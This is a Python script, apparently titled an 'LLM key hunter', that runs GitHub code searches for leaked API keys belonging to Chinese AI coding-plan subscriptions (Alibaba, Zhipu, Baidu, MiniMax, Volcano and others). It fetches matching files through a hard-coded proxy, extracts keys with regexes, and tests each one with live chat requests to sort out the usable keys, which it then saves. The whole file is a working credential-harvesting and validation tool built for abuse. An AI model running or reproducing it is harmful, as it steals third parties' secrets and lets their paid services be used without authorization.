Files
hack/tools/scripts/llm-key-hunter/hunt_plans_global.py
T

546 lines
21 KiB
Python

#!/usr/bin/env python3
"""Global hunter for CODING PLAN / TOKEN PLAN subscriptions.
Plan keys hit special subdomains and bundle a model set (Claude / GPT /
GLM / Qwen-Coder) behind a flat subscription. Golden rules (same as vault):
* 401 (or explicit invalid-key 400) = DEAD
* 200 chat with choices = USABLE
* 402/429/quota = NO_BALANCE (plan exists but exhausted/expired)
* everything else = NO_ACCESS/UNKNOWN
Only stdlib. GitHub via GH_PROXY (GFW blocked). Verification direct.
"""
import json, os, re, sys, time, urllib.parse, urllib.request, urllib.error
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent))
from verify_cache import CachedVerifier
HERE = Path(__file__).resolve().parent
OUT = HERE / "results" / "plans_global"
OUT.mkdir(parents=True, exist_ok=True)
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
TOKEN = (os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
or os.popen("gh auth token 2>/dev/null").read().strip())
if GH_PROXY:
GH_OPENER = urllib.request.build_opener(
urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}))
else:
GH_OPENER = urllib.request.build_opener()
DIRECT_OPENER = urllib.request.build_opener()
def gh_api(url):
req = urllib.request.Request(url, headers={
"Authorization": "token " + TOKEN,
"Accept": "application/vnd.github+json",
"User-Agent": "plan-hunter/1.0",
})
with GH_OPENER.open(req, timeout=30) as r:
return json.loads(r.read()), dict(r.headers)
# ── Plan providers ──────────────────────────────────────────────
# Each: search queries (GitHub code-search strings), regex to harvest,
# and a verifier(key)->(verdict, detail).
PROVIDERS = {}
def reg(name, queries, pattern, verifier, context=None):
PROVIDERS[name] = {
"queries": queries,
"re": re.compile(pattern),
"verify": verifier,
"context": context,
}
FAKE = ("xxxx", "your-", "example", "1234567890", "replace", "changeme",
"placeholder", "sk-test", "foo", "bar", "dummy", "sample",
"abcdef", "0000000000")
def looks_real(k):
kl = k.lower()
if any(f in kl for f in FAKE):
return False
return True
def http(base, path, key, body=None, timeout=25, headers=None):
url = base.rstrip("/") + path
h = {"Authorization": "Bearer " + key, "Accept": "*/*"}
data = None
if body is not None:
data = json.dumps(body).encode()
h["Content-Type"] = "application/json"
if headers:
h.update(headers)
req = urllib.request.Request(url, data=data, headers=h, method="POST" if body else "GET")
try:
with DIRECT_OPENER.open(req, timeout=timeout) as r:
return r.getcode(), r.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
try:
return e.code, e.read().decode("utf-8", "replace")
except Exception:
return e.code, ""
except Exception as e:
return 0, f"network:{type(e).__name__}:{e}"
def verdict_from(cc, cb):
low = (cb or "").lower()
if cc == 200 and '"choices"' in low:
return "USABLE", f"chat 200 {cb[:100]}"
if cc in (401, 403):
# 403 can be KYC/region; but 401 always dead
if cc == 401:
return "DEAD", f"{cc}: {cb[:140]}"
if any(w in low for w in ("invalid", "unauthor", "auth", "apikey", "api key", "denied")):
return "NO_ACCESS", f"{cc}: {cb[:140]}"
return "NO_ACCESS", f"{cc}: {cb[:140]}"
if cc in (402, 429):
return "NO_BALANCE", f"{cc}: {cb[:140]}"
if cc == 400:
if any(w in low for w in ("invalid", "auth", "apikey", "api key", "not exist", "unauthor")):
return "DEAD", f"400-auth: {cb[:140]}"
if any(w in low for w in ("balance", "quota", "insufficient", "arrear", "suspend",
"subscription", "plan", "limit", "额度", "余额", "充值")):
return "NO_BALANCE", f"400: {cb[:140]}"
return "NO_ACCESS", f"400: {cb[:140]}"
if cc == 0:
return "UNKNOWN", cb[:140]
if 500 <= cc < 600:
return "NO_ACCESS", f"5xx {cc}: {cb[:120]}"
return "NO_ACCESS", f"HTTP {cc}: {cb[:140]}"
# ── Verifiers ───────────────────────────────────────────────────
def v_ali_coding(key):
base = "https://coding.dashscope.aliyuncs.com/v1"
mc, mb = http(base, "/models", key, timeout=15)
cc, cb = http(base, "/chat/completions", key, {
"model": "qwen3-coder-plus",
"messages": [{"role": "user", "content": "hi"}],
"max_tokens": 5, "temperature": 0})
v, d = verdict_from(cc, cb)
return v, f"models={mc} {d}"
def v_zhipu_coding(key):
base = "https://open.bigmodel.cn/api/coding/paas/v4"
# glm-4.7-flash is free on coding plan; glm-5.2 needs paid plan.
cc, cb = http(base, "/chat/completions", key, {
"model": "glm-4.7-flash",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
v, d = verdict_from(cc, cb)
if v == "USABLE":
# probe a paid model to classify plan tier
pc, pb = http(base, "/chat/completions", key, {
"model": "glm-5.2",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
try:
j = json.loads(pb); code = j.get("error", {}).get("code", "")
except Exception:
code = ""
tier = f"glm-5.2:{pc}/{code}"
return v, f"{d} [{tier}]"
return v, d
def v_csdn(key):
# CSDN coding plan: base may carry model glm_for_coding; try chat.
for base in ("https://ai.csdn.net", "https://api.csdn.net"):
cc, cb = http(base, "/v1/chat/completions", key, {
"model": "glm_for_coding",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
v, d = verdict_from(cc, cb)
if v != "UNKNOWN":
return v, f"{base} {d}"
return "UNKNOWN", "no reachable CSDN endpoint"
def v_stepfun(key):
base = "https://api.stepfun.com/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "step-3.7-flash",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_qianfan(key):
# Baidu qianfan coding plan: bearer on qianfan.baidubce.com
base = "https://qianfan.baidubce.com/v2"
cc, cb = http(base, "/chat/completions", key, {
"model": "qianfan-code-latest",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
v, d = verdict_from(cc, cb)
if v == "NO_ACCESS" and cc == 404:
# model name drift; try generic coding model
cc2, cb2 = http(base, "/chat/completions", key, {
"model": "deepseek-v3",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc2, cb2)
return v, d
def v_iflytek_coding(key):
base = "https://maas-coding-api.xf-yun.com/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "astron-code-latest",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_minimax(key):
base = "https://api.minimaxi.com/v1"
cc, cb = http(base, "/text/chatcompletion_v2", key, {
"model": "MiniMax-M2.5",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_volcano(key):
base = "https://ark.cn-beijing.volces.com/api/v3"
cc, cb = http(base, "/chat/completions", key, {
"model": "ark-code-latest",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_mimo(key):
base = "https://api.xiaomimimo.com/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "mimo-v2.5",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_infini(key):
base = "https://cloud.infini-ai.com/maas/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "qwen3-coder",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_longcat(key):
base = "https://api.longcat.chat/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "LongCat-2.0-Chat",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_scnet(key):
base = "https://api.scnet.cn/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "qwen-coder",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
def v_opencode(key):
base = "https://api.opencode.ai/v1"
cc, cb = http(base, "/chat/completions", key, {
"model": "gpt-4o",
"messages": [{"role": "user", "content": "hi"}], "max_tokens": 5})
return verdict_from(cc, cb)
# ── Registry: queries + patterns ────────────────────────────────
reg("ali_coding",
["sk-sp- extension:env", "sk-sp- extension:yaml", "sk-sp- extension:yml",
"sk-sp- extension:json", "sk-sp- extension:toml",
"ALIBABA_CODING_PLAN_KEY extension:env",
"coding.dashscope.aliyuncs.com extension:py",
"coding.dashscope.aliyuncs.com extension:yaml",
"coding.dashscope.aliyuncs.com extension:json"],
r"sk-sp-[0-9a-f]{32}",
v_ali_coding)
reg("scnet",
["sk-tp- extension:env", "sk-tp- extension:yaml", "sk-tp- extension:json",
"SCNET_API_KEY extension:env", "api.scnet.cn extension:py",
"scnet coding plan"],
r"sk-[ts]p-[A-Za-z0-9_\-]{20,}",
v_scnet)
reg("zhipu_coding",
["open.bigmodel.cn/api/coding extension:py",
"open.bigmodel.cn/api/coding extension:yaml",
"open.bigmodel.cn/api/coding extension:json",
"open.bigmodel.cn/api/coding extension:env",
"ZHIPUAI_API_KEY extension:env",
"glm_for_coding extension:yaml"],
r"\b[0-9a-f]{32}\.[A-Za-z0-9]{16}\b",
v_zhipu_coding,
context=("bigmodel", "zhipu", "glm", "chatglm", "coding", "paas", "api_key",
"apikey", "authorization", "bearer", "base_url"))
reg("csdn_coding",
["CSDN_CODING_PLAN_KEY extension:env", "CSDN_API_KEY extension:env",
"ai.csdn.net extension:py", "ai.csdn.net extension:yaml",
"glm_for_coding extension:env", "glm_for_coding extension:json"],
r"(?i)(csdn[_-]?(?:coding|api)?[_-]?(?:plan|key)?[\"'=: ]{1,6}[A-Za-z0-9_\-\.]{24,})",
v_csdn)
reg("stepfun",
["STEPFUN_API_KEY extension:env", "STEPFUN_API_KEY extension:yaml",
"api.stepfun.com extension:py", "api.stepfun.com extension:yaml",
"step plan subscription"],
r"\b[0-9a-f]{64}\b",
v_stepfun,
context=("stepfun", "step-", "api.stepfun", "step_api", "authorization",
"bearer", "apikey", "api_key"))
reg("qianfan_coding",
["qianfan-code extension:yaml", "qianfan-code extension:py",
"QIANFAN_API_KEY extension:env", "BAIDU_API_KEY extension:env",
"qianfan.baidubce.com extension:py",
"qianfan coding plan"],
r"\b[bB][a-zA-Z0-9]{23,25}\b", # Baidu AK ~24 chars
v_qianfan,
context=("qianfan", "baidu", "bce", "qianfan.baidubce", "api_key",
"authorization", "bearer", "secretkey"))
reg("iflytek_coding",
["maas-coding-api.xf-yun.com extension:py",
"maas-coding-api.xf-yun.com extension:yaml",
"SPARK_API_KEY extension:env", "IFLYTEK_API_KEY extension:env",
"astron-code-latest extension:yaml"],
r"[A-Za-z0-9]{20,}:[A-Za-z0-9]{20,}", # key:secret style
v_iflytek_coding,
context=("xf-yun", "iflytek", "spark", "astron", "maas-coding",
"authorization", "bearer", "api_key"))
reg("minimax",
["sk-cp- extension:env", "sk-cp- extension:yaml", "sk-cp- extension:json",
"MINIMAX_API_KEY extension:env", "api.minimaxi.com extension:py",
"minimax token plan"],
r"sk-cp-[A-Za-z0-9_\-]{40,}",
v_minimax)
reg("volcano",
["ark-code-latest extension:yaml", "ark-code-latest extension:py",
"ARK_API_KEY extension:env", "VOLC_API_KEY extension:env",
"ark.cn-beijing.volces.com/api/v3 extension:py",
"volcano coding plan"],
r"\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b",
v_volcano,
context=("ark_api_key", "volc_accesskey", "volc_secret", "api_key", "apikey",
"authorization", "bearer", "ark.cn-beijing.volces", "base_url",
"ark-code", "ep-"))
reg("mimo",
["sk-cx- extension:env", "sk-cx- extension:yaml", "sk-cx- extension:json",
"MIMO_API_KEY extension:env", "XIAOMI_API_KEY extension:env",
"api.xiaomimimo.com extension:py"],
r"sk-cx-[A-Za-z0-9]{48}",
v_mimo)
reg("infini",
["INFINI_API_KEY extension:env", "INFINIAI_API_KEY extension:env",
"cloud.infini-ai.com extension:py", "cloud.infini-ai.com extension:yaml",
"infini coding"],
r"sk-[A-Za-z0-9]{48}",
v_infini,
context=("infini", "cloud.infini-ai", "api_key", "authorization", "bearer", "apikey"))
reg("longcat",
["ak_ extension:env", "ak_ extension:yaml", "ak_ extension:json",
"LONGCAT_API_KEY extension:env", "api.longcat.chat extension:py",
"longcat token plan"],
r"ak_[A-Za-z0-9]{29,}",
v_longcat)
reg("opencode",
["OPENCODE_GO_KEY extension:env", "OPENCODE_GO_KEY extension:yaml",
"opencode.ai extension:py", "opencode api key"],
r"sk-[A-Za-z0-9_\-]{32,}",
v_opencode,
context=("opencode", "opencode.ai", "open_code", "authorization", "bearer",
"api_key", "apikey"))
# ── GitHub search ───────────────────────────────────────────────
def search_code(query, max_results=60):
"""Return list of (repo, path, html_url) for a code-search query."""
out = []
for page in range(1, 4): # up to 300 results, but cap per query
url = ("https://api.github.com/search/code?"
+ urllib.parse.urlencode({"q": query, "per_page": 100, "page": page}))
try:
data, hdrs = gh_api(url)
except urllib.error.HTTPError as e:
if e.code in (403, 429):
# secondary / primary rate limit; back off
reset = e.headers.get("X-RateLimit-Reset")
wait = 0
if reset:
wait = max(0, int(reset) - int(time.time()) + 2)
wait = min(wait or 30, 120)
time.sleep(wait)
continue
if e.code == 422:
break
time.sleep(5)
continue
except Exception as e:
time.sleep(5)
continue
items = data.get("items", [])
for it in items:
out.append((it["repository"]["full_name"], it["path"], it["html_url"]))
if len(items) < 100:
break
# honor ~10 req/min for code search
time.sleep(6.5)
return out[:max_results]
def fetch_raw(repo, path):
for ref in ("HEAD", "main", "master"):
url = f"https://raw.githubusercontent.com/{repo}/{ref}/{path}"
req = urllib.request.Request(url, headers={"User-Agent": "plan-hunt/1.0"})
try:
with GH_OPENER.open(req, timeout=25) as r:
return r.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
if e.code == 404:
continue
return ""
except Exception:
continue
return ""
def harvest(text, spec):
low = (text or "").lower()
found = set()
for m in spec["re"].finditer(text or ""):
k = m.group(0)
if not looks_real(k):
continue
markers = spec.get("context")
if markers:
lo = max(0, m.start() - 80)
hi = min(len(low), m.end() + 80)
if not any(c in low[lo:hi] for c in markers):
continue
found.add(k)
return found
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("--only", default="", help="comma list of provider names")
ap.add_argument("--search", action="store_true", help="run GitHub search")
ap.add_argument("--verify", action="store_true", help="verify harvested keys")
ap.add_argument("--workers", type=int, default=16)
args = ap.parse_args()
names = [n for n in PROVIDERS if not args.only or n in args.only.split(",")]
# ── Search ──────────────────────────────────────────────────
cand_path = OUT / "candidates.tsv"
if args.search:
seen_urls = set()
if cand_path.exists():
for ln in cand_path.read_text().splitlines():
parts = ln.split("\t")
if len(parts) >= 4:
seen_urls.add(parts[3])
total_files = 0
for name in names:
spec = PROVIDERS[name]
print(f"\n=== {name}: {len(spec['queries'])} queries ===", flush=True)
for q in spec["queries"]:
try:
res = search_code(q)
except Exception as e:
print(f" query error: {e}", flush=True)
res = []
new = [r for r in res if r[2] not in seen_urls]
for repo, path, url in new:
seen_urls.add(url)
total_files += len(new)
print(f" {q[:55]:55} -> {len(res):3} hits, {len(new):3} new", flush=True)
# save progressively
if new:
with cand_path.open("a") as f:
for repo, path, url in new:
f.write(f"{name}\t{repo}\t{path}\t{url}\n")
time.sleep(2)
print(f"\nSearch done. {total_files} new candidate files -> {cand_path}")
# ── Harvest + verify ────────────────────────────────────────
if args.verify:
# group candidate files by provider
files_by_prov = {n: [] for n in names}
if cand_path.exists():
for ln in cand_path.read_text().splitlines():
parts = ln.split("\t")
if len(parts) != 4:
continue
name, repo, path, url = parts
if name in files_by_prov:
files_by_prov[name].append((repo, path, url))
for name in names:
spec = PROVIDERS[name]
files = files_by_prov.get(name, [])
print(f"\n=== {name}: harvesting {len(files)} files ===", flush=True)
keys = {} # key -> source url
for i, (repo, path, url) in enumerate(files):
txt = fetch_raw(repo, path)
for k in harvest(txt, spec):
keys.setdefault(k, url)
if (i + 1) % 20 == 0:
print(f" fetched {i+1}/{len(files)} keys={len(keys)}", flush=True)
time.sleep(0.2)
print(f" harvested {len(keys)} unique {name} keys", flush=True)
if not keys:
continue
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [],
"UNKNOWN": [], "DEAD": []}
with CachedVerifier(f"plan_{name}", spec["verify"]) as ver:
with ThreadPoolExecutor(max_workers=args.workers) as ex:
futs = {ex.submit(ver, k): (k, s) for k, s in keys.items()}
done = 0
for fut in as_completed(futs):
k, s = futs[fut]; done += 1
try:
v, d = fut.result()
except Exception as e:
v, d = "UNKNOWN", f"exc:{e}"
buckets[v].append((k, s, d))
if done % 20 == 0:
print(f" {done}/{len(keys)} usable={len(buckets['USABLE'])} "
f"nobal={len(buckets['NO_BALANCE'])} dead={len(buckets['DEAD'])}",
flush=True)
for label, fn in (("USABLE", "usable.txt"), ("NO_BALANCE", "no_balance.txt"),
("NO_ACCESS", "no_access.txt"), ("UNKNOWN", "unknown.txt"),
("DEAD", "dead.txt")):
with (OUT / f"{name}_{fn}").open("w") as f:
for k, s, d in buckets[label]:
f.write(f"{k}\t{s}\t{d}\n")
print(f" -> usable={len(buckets['USABLE'])} nobal={len(buckets['NO_BALANCE'])} "
f"dead={len(buckets['DEAD'])} other={len(buckets['NO_ACCESS'])+len(buckets['UNKNOWN'])}",
flush=True)
for k, s, d in buckets["USABLE"]:
print(f" ✅ {k[:48]} {d[:90]}")
print(f" {s}")
if __name__ == "__main__":
main()